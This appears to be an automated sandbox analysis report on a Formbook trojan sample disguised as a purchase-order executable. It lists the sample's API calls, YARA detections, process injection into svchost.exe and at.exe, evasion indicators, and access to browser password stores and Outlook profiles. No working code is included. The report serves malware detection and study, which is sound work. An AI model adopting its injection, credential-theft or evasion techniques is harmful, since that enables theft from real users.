Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_037DFA36 NtMapViewOfSection
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 034BF290 appears 103 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 034AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0342B970 appears 262 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03475130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03487E54 appears 107 times
Source: C:\Windows\SysWOW64\at.exe | Code function: String function: 03B4EA12 appears 86 times
Source: C:\Windows\SysWOW64\at.exe | Code function: String function: 03B27E54 appears 99 times
Source: C:\Windows\SysWOW64\at.exe | Code function: String function: 03ACB970 appears 262 times
Source: C:\Windows\SysWOW64\at.exe | Code function: String function: 03B15130 appears 58 times
Source: C:\Windows\SysWOW64\at.exe | Code function: String function: 03B5F290 appears 103 times
Source: C:\Users\user\Desktop\PO #86637.exe | Code function: String function: 004115D7 appears 36 times
Source: C:\Users\user\Desktop\PO #86637.exe | Code function: String function: 00416C70 appears 39 times
Source: C:\Users\user\Desktop\PO #86637.exe | Code function: String function: 00445AE0 appears 65 times
Source: PO #86637.exe, 00000000.00000003.1697872476.00000000047E3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs PO #86637.exe
Source: PO #86637.exe, 00000000.00000003.1696781527.000000000498D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs PO #86637.exe
Source: PO #86637.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.3547857189.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.1849093126.0000000007010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.3546549257.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.3547928511.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.1844812308.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.3549663217.0000000005080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.1845706736.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.3547926363.0000000002CD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/2@15/9
Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_0044AF6C GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState
Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle
Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode
Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize
Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx
Source: C:\Users\user\Desktop\PO #86637.exe | File created: C:\Users\user\AppData\Local\Temp\cunili
Source: PO #86637.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\PO #86637.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\PO #86637.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: at.exe, 00000003.00000003.2137677817.00000000034D2000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000003.2136592454.00000000034D2000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000002.3546898419.00000000034D2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: PO #86637.exe | Virustotal: Detection: 50%
Source: PO #86637.exe | ReversingLabs: Detection: 73%
Source: C:\Users\user\Desktop\PO #86637.exe | File read: C:\Users\user\Desktop\PO #86637.exe
Source: unknown | Process created: C:\Users\user\Desktop\PO #86637.exe "C:\Users\user\Desktop\PO #86637.exe"
Source: C:\Users\user\Desktop\PO #86637.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO #86637.exe"
Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe | Process created: C:\Windows\SysWOW64\at.exe "C:\Windows\SysWOW64\at.exe"
Source: C:\Windows\SysWOW64\at.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\PO #86637.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\PO #86637.exe | Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\PO #86637.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\PO #86637.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\PO #86637.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\PO #86637.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\PO #86637.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\PO #86637.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\PO #86637.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\PO #86637.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\PO #86637.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\at.exe | Section loaded: schedcli.dll
            Source: C:\Windows\SysWOW64\at.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\at.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\at.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\at.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\at.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\at.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\at.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\at.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\at.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\at.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\at.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\at.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\at.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\at.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\at.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\at.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\at.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\at.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\at.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\at.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\at.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\at.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\at.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe | Section loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\PO #86637.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
            Source: C:\Windows\SysWOW64\at.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: PO #86637.exe | Static file information: File size 1373705 > 1048576
            Source: Binary string: at.pdb source: svchost.exe, 00000001.00000003.1803876072.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1845110294.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000002.00000003.2248775259.000000000102B000.00000004.00000001.00020000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000002.00000002.3547175896.0000000001017000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: yRUFfzlnDkMN.exe, 00000002.00000000.1759627743.0000000000BFE000.00000002.00000001.01000000.00000004.sdmp, yRUFfzlnDkMN.exe, 00000007.00000002.3547128633.0000000000BFE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO #86637.exe, 00000000.00000003.1695463679.00000000046C0000.00000004.00001000.00020000.00000000.sdmp, PO #86637.exe, 00000000.00000003.1696781527.0000000004860000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1744447848.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1746074684.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1845247076.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1845247076.0000000003400000.00000040.00001000.00020000.00000000.sdmp, at.exe, 00000003.00000003.1845344566.0000000003732000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000002.3548240590.0000000003C3E000.00000040.00001000.00020000.00000000.sdmp, at.exe, 00000003.00000003.1848717012.00000000038EF000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000002.3548240590.0000000003AA0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO #86637.exe, 00000000.00000003.1695463679.00000000046C0000.00000004.00001000.00020000.00000000.sdmp, PO #86637.exe, 00000000.00000003.1696781527.0000000004860000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1744447848.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1746074684.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1845247076.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1845247076.0000000003400000.00000040.00001000.00020000.00000000.sdmp, at.exe, at.exe, 00000003.00000003.1845344566.0000000003732000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000002.3548240590.0000000003C3E000.00000040.00001000.00020000.00000000.sdmp, at.exe, 00000003.00000003.1848717012.00000000038EF000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000002.3548240590.0000000003AA0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: at.pdbGCTL source: svchost.exe, 00000001.00000003.1803876072.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1845110294.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000002.00000003.2248775259.000000000102B000.00000004.00000001.00020000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000002.00000002.3547175896.0000000001017000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: at.exe, 00000003.00000002.3546898419.0000000003452000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000002.3549391269.00000000040CC000.00000004.10000000.00040000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000007.00000000.1918974804.0000000002C4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2246132315.00000000388EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: at.exe, 00000003.00000002.3546898419.0000000003452000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000002.3549391269.00000000040CC000.00000004.10000000.00040000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000007.00000000.1918974804.0000000002C4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2246132315.00000000388EC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress, 0_2_0040EBD0
            Source: PO #86637.exe | Static PE information: real checksum: 0xa961f should be: 0x15c07e
            Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_00462463 push edi; ret 0_2_00462465
            Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004030B7 pushfd ; retf 1_2_004030B8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00426973 push es; ret 1_2_00426986
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00418110 push eax; iretd 1_2_00418114
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041411E push edi; ret 1_2_0041411F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00411A74 pushad ; iretd 1_2_00411A84
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00414AB4 pushad ; retf 1_2_00414AB5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00403460 push eax; ret 1_2_00403462
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004164EE push esp; ret 1_2_004164EF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034309AD push ecx; mov dword ptr [esp], ecx 1_2_034309B6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0340135E push eax; iretd 1_2_03401369
            Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03AA225F pushad ; ret 3_2_03AA27F9
            Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03AA27FA pushad ; ret 3_2_03AA27F9
            Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03AD09AD push ecx; mov dword ptr [esp], ecx 3_2_03AD09B6
            Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03AA283D push eax; iretd 3_2_03AA2858
            Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03AA1368 push eax; iretd 3_2_03AA1369
            Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_0320E611 pushad ; iretd 3_2_0320E621
            Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03220AA5 push edx; retf 3_2_03220AA6
            Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03214CAD push eax; iretd 3_2_03214CB1
            Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_0321308B push esp; ret 3_2_0321308C
            Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03211651 pushad ; retf 3_2_03211652
            Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03223510 push es; ret 3_2_03223523
            Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_0321BD2C push es; ret 3_2_0321BD32
            Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_037D52B0 push ebp; iretd 3_2_037D52B2
            Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_037D6115 push 5CC065C9h; retf 3_2_037D611A
            Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_037D0BC6 push edx; iretd 3_2_037D0BC7
            Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_037DC9BF push ecx; retf 3_2_037DC9DE
            Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_037DCF00 push 0000003Ch; iretd 3_2_037DCF02

            Boot Survival

            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe | Process created: C:\Windows\SysWOW64\at.exe "C:\Windows\SysWOW64\at.exe"
            Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_0047A330
            Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00434418
            Source: C:\Windows\SysWOW64\at.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\PO #86637.exe | API/Special instruction interceptor: Address: 40D228C
            Source: C:\Windows\SysWOW64\at.exe | API/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\at.exe | API/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\at.exe | API/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\at.exe | API/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\at.exe | API/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\at.exe | API/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\at.exe | API/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\at.exe | API/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0347096E rdtsc 1_2_0347096E
            Source: C:\Windows\SysWOW64\at.exe | Window / User API: threadDelayed 9838
            Source: C:\Users\user\Desktop\PO #86637.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-85675
            Source: C:\Users\user\Desktop\PO #86637.exe | API coverage: 3.3 %
            Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\at.exe | API coverage: 2.7 %
            Source: C:\Windows\SysWOW64\at.exe TID: 4308 | Thread sleep count: 135 > 30
            Source: C:\Windows\SysWOW64\at.exe TID: 4308 | Thread sleep time: -270000s >= -30000s
            Source: C:\Windows\SysWOW64\at.exe TID: 4308 | Thread sleep count: 9838 > 30
            Source: C:\Windows\SysWOW64\at.exe TID: 4308 | Thread sleep time: -19676000s >= -30000s
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe TID: 5900 | Thread sleep time: -70000s >= -30000s
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe TID: 5900 | Thread sleep count: 32 > 30
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe TID: 5900 | Thread sleep time: -32000s >= -30000s
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe TID: 5900 | Thread sleep time: -34500s >= -30000s
            Source: C:\Windows\SysWOW64\at.exe | Last function: Thread delayed
            Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00452492
            Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00442886
            Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_004788BD
            Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_004339B6
            Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose, 0_2_0045CAFA
            Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00431A86
            Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 0_2_0044BD27
            Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_0045DE8F FindFirstFileW,FindClose, 0_2_0045DE8F
            Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0044BF8B
            Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_0321C390 FindFirstFileW,FindNextFileW,FindClose, 3_2_0321C390
            Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_0321C4C6 FindFirstFileW,FindNextFileW,FindClose, 3_2_0321C4C6
